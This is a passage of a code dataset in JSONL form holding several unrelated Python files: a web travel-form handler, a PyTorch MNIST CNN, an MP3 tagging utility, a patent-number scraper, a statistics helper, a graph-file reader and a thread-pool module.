values_compare[from_time] >= values_compare[to_time]:\n error = \"Return time should be greater then traveling time when travelling on the same day.\"\n error_form_details = {\n 'time_error' : error\n }\n error_form_details.update(obtained_values)\n error_form_details.update(defaults)\n self.render(\"index.html\", **error_form_details)\n return\n\n travel_details = {\n 'from_city': from_city,\n 'to_city' : to_city,\n 'start_date' : from_datetime_date,\n 'return_date' : to_datetime_date,\n 'fuzzy_start_time': from_time,\n 'fuzzy_end_time' : to_time,\n 'num_passengers': int(num_passengers)\n }\n travel = TravelForm(**travel_details)\n\n travel.put()\n travel_details['start_date'] = from_datetime_date.strftime(\"%b %d %Y\")\n travel_details['return_date'] = to_datetime_date.strftime(\"%b %d %Y\")\n self.render(\"submitted.html\", **travel_details)\n\n\napp = webapp2.WSGIApplication([('/', MainHandler)],\n debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"51771087","text":"#!/usr/bin/env python3\n# fool 2020-05-01\n'''\n CNN on Pytorch\n'''\nimport torch\nfrom torch import nn\nimport torchvision\nimport torchvision.transforms as transforms\n\n# Device Configuration\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n# Hyper parameters\nnum_epochs = 2\nnum_classes = 10\nbatch_size = 100\nlearning_rate = 0.001\n\n\n# Mnist dataset\ntrainset = torchvision.datasets.MNIST(root='./data',\n train=True, download=True,\n transform=transforms.ToTensor()\n )\ntestset = 
torchvision.datasets.MNIST(root='./data',\n                                      train=False, download=True,\n                                      transform=transforms.ToTensor()\n                                      )\n\n# DataLoader\ntrainloader = torch.utils.data.DataLoader(dataset=trainset,\n                                          batch_size=batch_size,\n                                          shuffle=True)\ntestloader = torch.utils.data.DataLoader(dataset=testset,\n                                         batch_size=batch_size,\n                                         shuffle=False)\n\n# Convolutional neural network (two convolutional layers)\nclass ConvNet(nn.Module):\n    def __init__(self, num_classes=10):\n        super(ConvNet, self).__init__()\n        self.layer1 = nn.Sequential(\n            nn.Conv2d(1, 16, kernel_size=5, stride=1, padding=2),\n            nn.BatchNorm2d(16),\n            nn.ReLU(),\n            nn.MaxPool2d(2,2)\n        )\n        self.layer2 = nn.Sequential(\n            nn.Conv2d(16, 32, kernel_size=5, stride=1, padding=2),\n            nn.BatchNorm2d(32),\n            nn.ReLU(),\n            nn.MaxPool2d(2,2)\n        )\n        self.fc = nn.Linear(32*7*7, num_classes)\n\n    def forward(self, x):\n        out = self.layer1(x)\n        out = self.layer2(out)\n        out = out.reshape(out.size(0), -1)\n        out = self.fc(out)\n        return out\n\n\nmodel = ConvNet(num_classes).to(device)\n\n# loss and optimizer\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(params=model.parameters(), lr=learning_rate)\n\n# Train the model\nmodel.train()\ntotal_step = len(trainloader)\nfor epoch in range(num_epochs):\n    for i, (images, labels) in enumerate(trainloader):\n        images = images.to(device)\n        labels = labels.to(device)\n\n        # Forward pass\n        outputs = model(images)\n        loss = criterion(outputs, labels)\n\n        # Backward and optimize\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()\n\n        if (i+1) % 100 == 0:\n            print(\"Epoch: [{}/{}], Step: [{}/{}], Loss: {:.4f}\"\n                  .format(epoch+1, num_epochs, i+1, total_step, loss.item()))\n\n# Test the model\nmodel.eval()\nwith torch.no_grad():\n    correct = 0\n    total = 0\n    for images, labels in testloader:\n        images = images.to(device)\n        labels = labels.to(device)\n\n        outputs = model(images)\n        _, predicted = torch.max(outputs, 1)\n        total += labels.size(0)\n        correct += (predicted == labels).sum().item()\n\n    print('Test accuracy of the model on the 10000 images: {}%'.format(100*correct/total))\n# Save the model checkpoint\ntorch.save(model.state_dict(), 'torch_cnn.ckpt')","sub_path":"machine_learning_2020/pytorch/torch_cnn.py","file_name":"torch_cnn.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
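# Editor's sketch (not from the source record): torch_cnn.py above ends by saving a
# checkpoint; a minimal, hedged example of loading it back for inference. Assumes the
# same ConvNet class, num_classes and device as defined in that record.
import torch

model = ConvNet(num_classes)
model.load_state_dict(torch.load('torch_cnn.ckpt', map_location=device))
model.eval()  # disable dropout and freeze batch-norm statistics before inference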
+{"seq_id":"416277646","text":"from pprint import pprint\r\nfrom time import time\r\nimport base64\r\nfrom glob import glob\r\nimport io\r\nimport os\r\nfrom os import system\r\nimport subprocess\r\nfrom urllib import parse\r\nfrom urllib.request import urlopen\r\nimport json\r\n\r\ntry: \r\n    import shlex\r\n    import platform\r\n    import pathlib\r\n    from mutagen import File\r\n    from mutagen.easyid3 import EasyID3\r\n    import mutagen.id3\r\n    from mutagen.id3 import Encoding\r\n    from mutagen.mp3 import MP3\r\n    from PIL import Image\r\n    import requests\r\nexcept ImportError as e:\r\n    print(e)\r\n    print('Press Enter to quit...')\r\n    quit()\r\n\r\n# TODO: Add ffmpeg binary to the repo\r\np = subprocess.Popen('ffmpeg', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\nout, err = p.communicate()\r\nar = b\"'ffmpeg' is not recognized as an internal or external command,\\r\\noperable program or batch file.\\r\\n\"\r\nif ar == err:\r\n    print('FFMPEG NOT ON PATH')\r\n    input('Press enter to go to FFMPEG website and learn how to add to path...')\r\n    import webbrowser\r\n    webbrowser.open('https://ffmpeg.org/download.html')\r\n    webbrowser.open('http://blog.gregzaal.com/how-to-install-ffmpeg-on-windows/')\r\n    quit()\r\n\r\n# this dictionary stores the api keys\r\nconfig = {}\r\nspotify_access_token_creation = 0\r\nspotify_access_token = ''\r\n\r\n\r\ndef copy(text):\r\n    if platform.system() == 'Windows':\r\n        command = f'echo|set/p={text}|clip'\r\n        system(command)\r\n        return True\r\n    return False\r\n\r\n\r\ndef get_spotify_access_token():\r\n    global spotify_access_token, spotify_access_token_creation\r\n    if time() - spotify_access_token_creation > 21600:\r\n        spotify_access_token_creation = time()\r\n        header = {'Authorization': 'Basic ' + SPOTIFY_B64_AUTH_STR}\r\n        data = {'grant_type': 'client_credentials'}\r\n        access_token_response = requests.post('https://accounts.spotify.com/api/token', headers=header, data=data)\r\n        spotify_access_token = access_token_response.json()['access_token']\r\n    return spotify_access_token\r\n\r\n\r\ntry:\r\n    with open('config.json') as config_file:\r\n        config: dict = json.load(config_file)\r\n    SPOTIFY_AUTH_STR = f\"{config['SPOTIFY_CLIENT_ID']}:{config['SPOTIFY_SECRET']}\"\r\n    SPOTIFY_B64_AUTH_STR = base64.urlsafe_b64encode(SPOTIFY_AUTH_STR.encode()).decode()\r\n    print('Spotify API keys loaded')\r\n    LASTFM_API = config['LASTFM_API']\r\n    LASTFM_SECRET = config['LASTFM_SECRET']\r\n    print('LASTFM API keys loaded')\r\n    # TODO: support multiple directories\r\n    # this is for future when I get a Soundcloud api key\r\n    # SOUNDCLOUD_CLIENT_ID = config['SOUNDCLOUD_CLIENT_ID']\r\n    # SOUNDCLOUD_CLIENT_SECRET = config['SOUNDCLOUD_CLIENT_SECRET']\r\nexcept (FileNotFoundError, KeyError):\r\n    print('Limited functionality')\r\n\r\n\r\ndef set_title(audio: EasyID3, title: str):\r\n    \"\"\"\r\n    Sets a title for an EasyID3 object\r\n    :param audio: EasyID3 Object\r\n    :param title: string\r\n    \"\"\"\r\n    audio['title'] = title\r\n    audio.save()\r\n\r\n\r\ndef set_artists(audio: EasyID3, artists):\r\n    \"\"\"\r\n    Sets an artist for an EasyID3 object\r\n    :param audio: EasyID3\r\n    :param artist: string or list[str] of the artist or artists\r\n    \"\"\"\r\n    audio['artist'] = artists\r\n    audio.save()\r\n\r\n\r\ndef set_album(audio: EasyID3, album):\r\n    \"\"\"\r\n    Sets an album for an EasyID3 object\r\n    :param audio: EasyID3\r\n    :param album: string name of the album\r\n    \"\"\"\r\n    audio['album'] = album\r\n    audio.save()\r\n\r\n\r\ndef set_album_artist(audio: EasyID3, album_artist):\r\n    \"\"\"\r\n    Sets an album artist for an EasyID3 object\r\n    :param audio: EasyID3\r\n    :param album_artist: name of the album artist\r\n    \"\"\"\r\n    audio['albumartist'] = album_artist\r\n    audio.save()\r\n\r\n\r\ndef get_artist(filename):\r\n    \"\"\"\r\n    Extraction of artist name(s) from filename\r\n    Different ways to name a file\r\n    Lots of these are just-in-case situations\r\n    The standard for naming multiple artists is comma separated values with a space after each comma\r\n    Eg. filename = \"artist_1, artist_2, artist_3 - title.mp3\"\r\n    \"\"\"\r\n\r\n    artist = filename[:filename.index(' -')]\r\n\r\n    if artist.count(' , '): artist = artist.split(' , ')\r\n    elif artist.count(', '): artist = artist.split(', ')\r\n    elif artist.count(','): artist = artist.split(',')\r\n\r\n    if artist.count(' vs. '): artist = artist.split(' vs. ')\r\n    elif artist.count(' vs '): artist = artist.split(' vs ')\r\n    elif artist.count(' vs.'): artist = artist.split(' vs.')\r\n    elif artist.count(' vs'): artist = artist.split(' vs')\r\n\r\n    # Cannot split on & because \"Dimitri Vegas & Like Mike\" is considered as one artist\r\n\r\n    if artist.count(' and '): artist = artist.split(' and ')\r\n    elif artist.count(' and'): artist = artist.split(' and')\r\n\r\n    if artist.count(' ft '): artist = artist.split(' ft ')\r\n    elif artist.count(' ft. '): artist = artist.split(' ft. ')\r\n    elif artist.count(' ft.'): artist = artist.split(' ft.')\r\n    elif artist.count(' ft'): artist = artist.split(' ft')\r\n\r\n    if artist.count(' feat '): artist = artist.split(' feat ')\r\n    elif artist.count(' feat. '): artist = artist.split(' feat. ')\r\n    elif artist.count(' feat.'): artist = artist.split(' feat.')\r\n    elif artist.count(' feat'): artist = artist.split(' feat')\r\n\r\n    return artist\r\n\r\n\r\ndef add_simple_meta(file_path, artist='', title='', album='', albumartist='', override=False):\r\n    \"\"\"\r\n    Automatically sets the metadata for a music file\r\n    :param file_path: the path to the music file\r\n    :param artist: given artist name\r\n    :param title: given title name\r\n    :param album: given album name\r\n    :param albumartist: given album artist\r\n    :param override: if True, all of the metadata is overridden\r\n    :return: True or False depending on whether audio file was changed or not\r\n    \"\"\"\r\n    audio = EasyID3(file_path)\r\n    filename = pathlib.Path(file_path).name  # or filename = file_path[:-4]\r\n    try:\r\n        if (not override and audio.get('title') and audio.get('artist')\r\n                and audio.get('albumartist') and has_album_cover(file_path)): return False\r\n        if artist == '': artist = get_artist(filename)\r\n        else:\r\n            if artist.count(' , '): artist = artist.split(' , ')\r\n            elif artist.count(', '): artist = artist.split(', ')\r\n            elif artist.count(','): artist = artist.split(',')\r\n        if title == '': title = filename[filename.index('-') + 2:-4]\r\n        if override:\r\n            audio['title'] = title\r\n            audio['artist'] = artist\r\n            if album != '': audio['album'] = album\r\n            if albumartist != '': audio['albumartist'] = albumartist\r\n        else:\r\n            if 'album' not in audio:\r\n                if album == '': audio['album'] = title\r\n                else: audio['album'] = album\r\n            if 'title' not in audio: audio['title'] = title\r\n            if 'artist' not in audio: audio['artist'] = artist\r\n            if 'albumartist' not in audio:\r\n                if albumartist == '': audio['albumartist'] = artist\r\n                else: audio['albumartist'] = albumartist\r\n        audio.save()\r\n        if not has_album_cover(file_path): set_album_cover(file_path)\r\n        return True\r\n    except ValueError:\r\n        print('Error with', filename)\r\n        return False\r\n\r\n\r\nset_simple_meta = add_simple_meta\r\n\r\n\r\ndef has_album_cover(audio) -> bool:\r\n    \"\"\"\r\n    Checks if the file has an album cover\r\n    Also fixes album cover key + Encoding\r\n    :param audio: Either file path or audio object\r\n    :return: boolean expressing whether the file contains album cover\r\n    \"\"\"\r\n    if type(audio) == str: audio: File = File(audio)\r\n    try:\r\n        fix_cover(audio)\r\n        if 'APIC:' in audio:\r\n            apic: mutagen.id3.APIC = audio['APIC:']\r\n            if apic.encoding != Encoding.LATIN1:\r\n                apic.encoding = Encoding.LATIN1\r\n                audio['APIC:'] = apic\r\n                audio.save()\r\n            return True\r\n    except KeyError: audio.add_tags()\r\n    return False\r\n\r\n\r\ndef retrieve_album_art(audio: MP3):\r\n    apics = [k for k in audio if k.startswith('APIC')]\r\n    if apics: return apics[0]\r\n    return None\r\n\r\n\r\nget_album_art = 
retrieve_album_art\r\n\r\n\r\ndef search_album_art(artist, title, select_index=0, return_all=False):\r\n # TODO: rename to search_album_art\r\n \"\"\"\r\n Fetches max resolution album cover(s) for track (artist and title specified) using Spotify API\r\n :param artist: artist\r\n :param title: title of track\r\n :param select_index: which result to pick (by default the first)\r\n :param return_all: if set to True, function returns all max res album cover\r\n :return: url(s) of the highest resolution album cover for the track\r\n \"\"\"\r\n # TODO: add soundcloud search as well if spotify comes up with no results.\r\n # Soundcloud has it disabled\r\n artist, title = parse.quote_plus(artist), parse.quote_plus(title)\r\n header = {'Authorization': 'Bearer ' + get_spotify_access_token()}\r\n r = requests.get(f'https://api.spotify.com/v1/search?q={title}+artist:{artist}&type=track', headers=header)\r\n if return_all: return [item['album']['images'][0]['url'] for item in r.json()['tracks']['items']]\r\n return r.json()['tracks']['items'][select_index]['album']['images'][0]['url']\r\n\r\n\r\ndef set_album_cover(file_path, img_path='', url='', copy_from='', title='', artist='', select_index=0):\r\n audio = MP3(file_path, ID3=mutagen.id3.ID3)\r\n filename = pathlib.Path(file_path).name\r\n try:\r\n audio.add_tags()\r\n except mutagen.id3.error:\r\n pass\r\n if title and artist:\r\n try:\r\n img_path = search_album_art(artist, title)\r\n image_data = urlopen(img_path).read()\r\n except (KeyError, ValueError, IndexError):\r\n print(f'Album cover not found for: {filename}')\r\n return False\r\n elif img_path:\r\n with open(img_path, 'rb') as bits: # better than open(albumart, 'rb').read() ?\r\n image_data = bits.read()\r\n elif url:\r\n img_path = url = url.replace(' ', '')\r\n image_data = urlopen(url).read()\r\n elif copy_from:\r\n other_audio = MP3(copy_from, ID3=mutagen.id3.ID3)\r\n try:\r\n audio['APIC:'] = other_audio['APIC:']\r\n audio.save()\r\n except KeyError:\r\n other_audio = other_audio.items()\r\n unchanged = True\r\n for k, v in other_audio:\r\n if k.startswith('APIC:'):\r\n audio['APIC:'] = v\r\n audio.save()\r\n unchanged = False\r\n if unchanged: print('That file is incompatible.')\r\n else:\r\n easy_audio = EasyID3(file_path)\r\n if 'title' in easy_audio and not title:\r\n title = easy_audio['title'][0]\r\n else:\r\n add_simple_meta(file_path)\r\n title = filename[filename.index('-') + 2:-4]\r\n if 'artist' in easy_audio and not artist:\r\n artist = easy_audio['artist'][0]\r\n else:\r\n add_simple_meta(file_path)\r\n artist = get_artist(filename)\r\n try:\r\n img_path = search_album_art(artist, title, select_index=select_index)\r\n image_data = urlopen(img_path).read()\r\n except (KeyError, ValueError, IndexError):\r\n return False\r\n\r\n if img_path.endswith('png'): mime = 'image/png'\r\n else: mime = 'image/jpeg'\r\n data = io.BytesIO(image_data)\r\n im = Image.open(data)\r\n image_data = io.BytesIO()\r\n im.save(image_data, optimize=True, format='JPEG')\r\n # image.desc = 'front cover'\r\n audio['APIC:'] = mutagen.id3.APIC(\r\n encoding=0, # 3 is for utf-8\r\n mime=mime, # image/jpeg or image/png\r\n type=3, # 3 is for the cover image\r\n # desc=u'Album Cover',\r\n data=image_data.getvalue()\r\n )\r\n audio.save()\r\n return True\r\n\r\n\r\nadd_mp3_cover = add_album_cover = set_album_cover\r\n\r\n\r\n# @memoize\r\ndef get_temp_path(filename):\r\n base = os.path.basename(filename)\r\n base = f'TEMP {base}'\r\n directory = os.path.dirname(filename)\r\n temp_path = directory + '/' + 
base\r\n # os.rename(filename, temp_path)\r\n return temp_path\r\n\r\n\r\ndef ffmpeg_helper(filename, command):\r\n audio = EasyID3(filename)\r\n artists = audio['artist']\r\n title = audio['title']\r\n album = audio['album']\r\n album_artist = audio['albumartist']\r\n album_cover = MP3(filename, ID3=mutagen.id3.ID3)['APIC:']\r\n temp_path = get_temp_path(filename)\r\n os.rename(filename, temp_path)\r\n os.system(command)\r\n audio = EasyID3(filename)\r\n audio['artist'] = artists\r\n audio['title'] = title\r\n audio['album'] = album\r\n audio['albumartist'] = album_artist\r\n audio.save()\r\n audio = MP3(filename, ID3=mutagen.id3.ID3)\r\n audio['APIC:'] = album_cover\r\n audio.save()\r\n os.remove(temp_path)\r\n os.remove(os.path.dirname(filename) + '/ffmpeg.log')\r\n\r\n\r\ndef trim(filename, start: int, end: int):\r\n temp_path = get_temp_path(filename)\r\n command = f'ffmpeg -i \"{temp_path}\" -ss {start} -t {end} -c copy \"{filename}\" > ffmpeg.log 2>&1'\r\n ffmpeg_helper(filename, command)\r\n\r\n\r\ndef remove_silence(filename):\r\n temp_path = get_temp_path(filename)\r\n command = f'ffmpeg -i \"{temp_path}\" -af silenceremove=start_periods=1:stop_periods=1:detection=peak \"{filename}\" ' \\\r\n f'> ffmpeg.log 2>&1'\r\n ffmpeg_helper(filename, command)\r\n\r\n\r\ndef set_genre(filename, genres=None):\r\n # requires last fm api\r\n if genres is None:\r\n easy_audio = EasyID3(filename)\r\n artist, title = easy_audio['artist'][0], easy_audio['title'][0]\r\n error_string = f'Genre not set for {artist} - {title}'\r\n artist, title = parse.quote_plus(artist), parse.quote_plus(title)\r\n url = f'https://ws.audioscrobbler.com/2.0/?method=track.getInfo&track={title}&artist={artist}&api_key={LASTFM_API}&format=json'\r\n r = requests.get(url)\r\n try: sample = r.json()['track']['toptags']['tag']\r\n except KeyError:\r\n print(error_string)\r\n return False\r\n genres = [tag['name'] for tag in sample][:3]\r\n audio = MP3(filename)\r\n audio['TCON'] = mutagen.id3.TCON(encoding=3, text=u';'.join(genres)) # genre key is TCON\r\n audio.save()\r\n return True\r\n\r\n\r\ndef get_genre(audio: MP3):\r\n return audio.get('TCON')\r\n\r\n\r\n# audio[u\"USLT::'eng'\"] = (USLT(encoding=3, lang=u'eng', desc=u'desc', text=lyrics))\r\ndef get_lyrics(audio: MP3):\r\n return audio.get(u\"USLT::'eng'\")\r\n\r\n\r\ndef remove_covers(audio: MP3):\r\n for key in audio.keys():\r\n if key.startswith('APIC'): audio.pop(key)\r\n audio.save()\r\n\r\n\r\ndef optimize_cover(audio: MP3):\r\n apic = retrieve_album_art(audio)\r\n if apic:\r\n data = apic.data\r\n data = io.BytesIO(data)\r\n im = Image.open(data)\r\n new_data = io.BytesIO()\r\n im.save(new_data, optimize=True, format='JPEG')\r\n if len(data.getvalue()) - len(new_data.getvalue()) > 0:\r\n audio['APIC:'] = mutagen.id3.APIC(\r\n encoding=0, # 3 is for utf-8\r\n mime='image/jpeg', # image/jpeg or image/png\r\n type=3, # 3 is for the cover image\r\n # desc=u'Cover',\r\n data=new_data.getvalue()\r\n )\r\n audio.save()\r\n\r\n\r\ndef fix_cover(audio: File):\r\n \"\"\"\r\n Transfers album cover from audio key APIC:XXXX to APIC:\r\n Example\r\n audio['APIC: Payday 2.jpg'] = APIC() becomes audio['APIC:'] = APIC()\r\n \"\"\"\r\n for k in audio.keys():\r\n if k.startswith('APIC:') and k != 'APIC:':\r\n audio['APIC:'] = audio.pop(k)\r\n audio.save()\r\n break\r\n\r\n\r\ndef get_bitrate(audio: File):\r\n return audio.info.bitrate\r\n \r\n\r\nif __name__ == '__main__':\r\n 
pass\r\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":15724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"250472723","text":"'''获取专利号'''\nfrom bs4 import BeautifulSoup\nfrom bs4 import SoupStrainer\n\nimport public_fun\n\n\nonly_a_tags = SoupStrainer(\"a\")\nonly_span_tags = SoupStrainer('span')\n\n\ndef get_patent_number(text):\n '''获取patent_number'''\n soup = BeautifulSoup(text, 'html.parser', parse_only=only_a_tags)\n aTagList = soup.find_all('a', class_='title')\n for aTag in aTagList:\n patent_number = aTag['href'].split('/')[-2]\n yield (patent_number,)\n\n\ndef get_page_num(text):\n '''获取页面数'''\n try:\n soup = BeautifulSoup(text, 'html.parser', parse_only=only_span_tags)\n span = soup.find_all('span', class_='page_link')[0]\n page_num = (span.string.strip()).split('/')[-1]\n except Exception:\n page_num = 1\n return page_num\n\n\ndef get_category_url():\n conn = public_fun.init_db('mysql')\n cur = conn.cursor()\n sql = 'select small_class from category where stat = 0'\n cur.execute(sql)\n rows = cur.fetchall()\n for row in rows:\n yield 'http://s.wanfangdata.com.cn/Patent.aspx?q=class%3a%22{}%22+%E7%94%B3%E8%AF%B7%E6%97%A5%E6%9C%9F%3a'.format(row[0])\n\n cur.close()\n conn.close()\n\n\ndef url_producer():\n '''URL生产器'''\n for cate_url in get_category_url():\n for i in range(1981, 2017):\n if i <= 1981:\n yield cate_url + '-1981&f=pateYear'\n else:\n yield cate_url + str(i) + '-' + str(i) + '&f=pateYear'\n\nif __name__ == \"__main__\":\n\n conn = public_fun.init_db('mysql')\n cur = conn.cursor()\n sql = \"INSERT IGNORE INTO `article`(patent_number) VALUES(%s);\"\n for url in url_producer():\n htm = public_fun.get_html(url)\n page_num = get_page_num(htm)\n for page in range(1, int(page_num) + 1):\n uri = url + '&p=' + str(page)\n try:\n text = public_fun.get_html(uri)\n except Exception as e:\n print(e)\n with open('bug.log', 'a') as f:\n f.write(uri + '\\n')\n continue\n data = list(get_patent_number(text))\n cur.executemany(sql, data)\n conn.commit()\n print('parse ' + uri[20:] + ' Done')\n\n cur.close()\n conn.close()\n","sub_path":"wanfangdata/get_patent_number.py","file_name":"get_patent_number.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"512596702","text":"from Statistics.Variance import findvariance\nfrom Calculator.SquareRoot import squarerootfunc\n\n\ndef findsd(value):\n\n try:\n variance = findvariance(value)\n return round(squarerootfunc(variance), 5)\n\n except ValueError:\n print(\"List is empty\")\n\n except ZeroDivisionError:\n print(\"Divide by 0 error\")","sub_path":"Statistics/StandardDeviation.py","file_name":"StandardDeviation.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"464937662","text":"from extender import *\n\n\ndef read_str_array(container, strArray):\n array_len = len(strArray)\n i = 0\n figNum = 0\n while i < array_len:\n str = strArray[i]\n key = int(str)\n if key == 1:\n i += 1\n movie = Game()\n i = movie.read_str_array(strArray, i)\n elif key == 2:\n i += 1\n movie = Cartoon()\n i = movie.read_str_array(strArray, i)\n elif key == 3:\n i += 1\n movie = Documentary()\n i = movie.read_str_array(strArray, i)\n else:\n return figNum\n if i == 0:\n return figNum\n figNum += 1\n container.store.append(movie)\n return 
figNum\n","sub_path":"AVS/ReadStrArray.py","file_name":"ReadStrArray.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"374347347","text":"import os\n\n\ndef readGraph(file_graph):\n\n TheGraph = open(file_graph, 'r')\n all_arcs = TheGraph.readlines()\n TheGraph.close()\n\n return all_arcs\n\n\ndef getOrigDest(all_arcs):\n\n Origine = []\n Destination = []\n for one_arc in all_arcs:\n this_arc = one_arc.split(\"\\t\")\n orig = int(this_arc[0])\n dest = int(this_arc[1].strip(\"\\n\"))\n Origine.append(orig)\n Destination.append(dest)\n\n return {'orig': Origine, 'dest': Destination}\n\n\ndef getNbArcVert(Origine, Destination):\n return {'NbArcs': len(Origine), 'NbVertices': max(max(Origine), max(Destination))+1}\n\n\n# numsucc: numero de l'arc succ\n# numprec: numero de l'arc prec\ndef getSuccPrec(Origine, Destination):\n\n infoNbArcVert = getNbArcVert(Origine, Destination)\n NbArcs = infoNbArcVert['NbArcs']\n NbVertices = infoNbArcVert['NbVertices']\n\n # la liste des successeurs de i\n # succ = new [len(NbVertices2)][] en java\n succ = [[] for i in range(NbVertices)]\n # Numero de l'arc successeur de i\n numsucc = [[] for i in range(NbVertices)]\n # Numero des arcs précedents\n numprec = [[] for i in range(NbVertices)]\n # la liste des pédécesseurs de i\n prec = [[] for i in range(NbVertices)]\n\n for u in range(0, NbArcs):\n i = Origine[u]\n j = Destination[u]\n succ[i].append(j)\n numsucc[i].append(u)\n prec[j].append(i)\n numprec[j].append(u)\n\n return {'succ': succ, 'prec': prec, 'numsucc': numsucc, 'numprec': numprec}\n\n\n# _nsucc: numero de l'arc succ\n# _nprec: numero de l'arc prec\ndef getABSuccPrec(Origine, Destination):\n\n infoNbArcVert = getNbArcVert(Origine, Destination)\n NbArcs = infoNbArcVert['NbArcs']\n NbVertices = infoNbArcVert['NbVertices']\n\n infoSuccPrec = getSuccPrec(Origine, Destination)\n succ = infoSuccPrec['succ']\n numsucc = infoSuccPrec['numsucc']\n prec = infoSuccPrec['prec']\n numprec = infoSuccPrec['numprec']\n\n _asucc = []\n _bsucc = []\n _nsucc = []\n _inds = 0\n\n for j in range(0, NbVertices):\n _asucc.append(_inds)\n _inds = _inds + len(succ[j])\n _bsucc = _bsucc + succ[j]\n _nsucc = _nsucc + numsucc[j]\n\n _asucc.append(_inds)\n\n _aprec = []\n _bprec = []\n _nprec = []\n _inds = 0\n\n for j in range(0, NbVertices):\n _aprec.append(_inds)\n _inds = _inds + len(prec[j])\n _bprec = _bprec + prec[j]\n _nprec = _nprec + numprec[j]\n _aprec.append(_inds)\n\n return {'_asucc': _asucc, '_bsucc': _bsucc, '_nsucc': _nsucc, '_aprec': _aprec, '_bprec': _bprec, '_nprec': _nprec}\n\n\ndef getOrigDestCpty(all_arcs):\n Origine = []\n Destination = []\n MaxCapacity = []\n MinCapacity = []\n for un_arc in all_arcs:\n cet_arc = un_arc.split(\"\\t\")\n orig = int(cet_arc[0])\n dest = int(cet_arc[1])\n capmin = int(cet_arc[2])\n capmax = int(cet_arc[3])\n Origine.append(orig)\n Destination.append(dest)\n MinCapacity.append(capmin)\n MaxCapacity.append(capmax)\n\n return {'orig': Origine, 'dest': Destination, 'maxCpty': MaxCapacity, 'minCpty': MinCapacity}\n\n\ndef getOrigDestCptyCost(all_arcs):\n Origine = []\n Destination = []\n MaxCapacity = []\n MinCapacity = []\n Cost = []\n\n for un_arc in all_arcs:\n cet_arc = un_arc.split(\"\\t\")\n orig = int(cet_arc[0])\n dest = int(cet_arc[1])\n capmin = int(cet_arc[2])\n capmax = int(cet_arc[3])\n cost = int(cet_arc[4])\n Origine.append(orig)\n Destination.append(dest)\n MinCapacity.append(capmin)\n 
def getOrigDestCptyCost(all_arcs):\n    Origine = []\n    Destination = []\n    MaxCapacity = []\n    MinCapacity = []\n    Cost = []\n\n    for un_arc in all_arcs:\n        cet_arc = un_arc.split(\"\\t\")\n        orig = int(cet_arc[0])\n        dest = int(cet_arc[1])\n        capmin = int(cet_arc[2])\n        capmax = int(cet_arc[3])\n        cost = int(cet_arc[4])\n        Origine.append(orig)\n        Destination.append(dest)\n        MinCapacity.append(capmin)\n        MaxCapacity.append(capmax)\n        Cost.append(cost)\n\n    return {'orig': Origine, 'dest': Destination, 'maxCpty': MaxCapacity, 'minCpty': MinCapacity, 'cost': Cost}\n","sub_path":"Tp3/ReadGraph.py","file_name":"ReadGraph.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"568548759","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\bzETL\\util\\multithread.py\n# Compiled at: 2013-11-22 17:13:19\nimport threading\nfrom .struct import nvl\nfrom .logs import Log\nfrom .threads import Queue, Thread\nDEBUG = True\n\nclass worker_thread(threading.Thread):\n\n    def __init__(self, name, in_queue, out_queue, function):\n        threading.Thread.__init__(self)\n        self.name = name\n        self.in_queue = in_queue\n        self.out_queue = out_queue\n        self.function = function\n        self.keep_running = True\n        self.num_runs = 0\n        self.start()\n\n    def join(self, timeout=None):\n        while self.isAlive():\n            Log.note('Waiting on thread {{thread}}', {'thread': self.name})\n            threading.Thread.join(self, nvl(timeout, 0.5))\n\n    def run(self):\n        got_stop = False\n        while self.keep_running:\n            request = self.in_queue.pop()\n            if request == Thread.STOP:\n                got_stop = True\n                if self.in_queue.queue:\n                    Log.warning('programmer error')\n                break\n            if not self.keep_running:\n                break\n            try:\n                try:\n                    if DEBUG and hasattr(self.function, 'func_name'):\n                        Log.note('run {{function}}', {'function': self.function.func_name})\n                    result = self.function(**request)\n                    if self.out_queue != None:\n                        self.out_queue.add({'response': result})\n                except Exception as e:\n                    Log.warning('Can not execute with params={{params}}', {'params': request}, e)\n                    if self.out_queue != None:\n                        self.out_queue.add({'exception': e})\n\n            finally:\n                self.num_runs += 1\n\n        self.keep_running = False\n        if self.num_runs == 0:\n            Log.warning('{{name}} thread did no work', {'name': self.name})\n        if DEBUG and self.num_runs != 1:\n            Log.note('{{name}} thread did {{num}} units of work', {'name': self.name, \n             'num': self.num_runs})\n        if got_stop and self.in_queue.queue:\n            Log.warning('multithread programmer error')\n        if DEBUG:\n            Log.note('{{thread}} DONE', {'thread': self.name})\n        return\n\n    def stop(self):\n        self.keep_running = False\n\n\nclass Multithread(object):\n\n    def __init__(self, functions):\n        self.outbound = Queue()\n        self.inbound = Queue()\n        self.threads = []\n        for t, f in enumerate(functions):\n            thread = worker_thread('worker ' + unicode(t), self.inbound, self.outbound, f)\n            self.threads.append(thread)\n\n    def __enter__(self):\n        return self\n\n    def __exit__(self, type, value, traceback):\n        try:\n            if isinstance(value, Exception):\n                self.inbound.close()\n            self.inbound.add(Thread.STOP)\n            self.join()\n        except Exception as e:\n            Log.warning('Problem sending stops', e)\n\n    def join(self):\n        try:\n            try:\n                for t in self.threads:\n                    t.join()\n\n            except 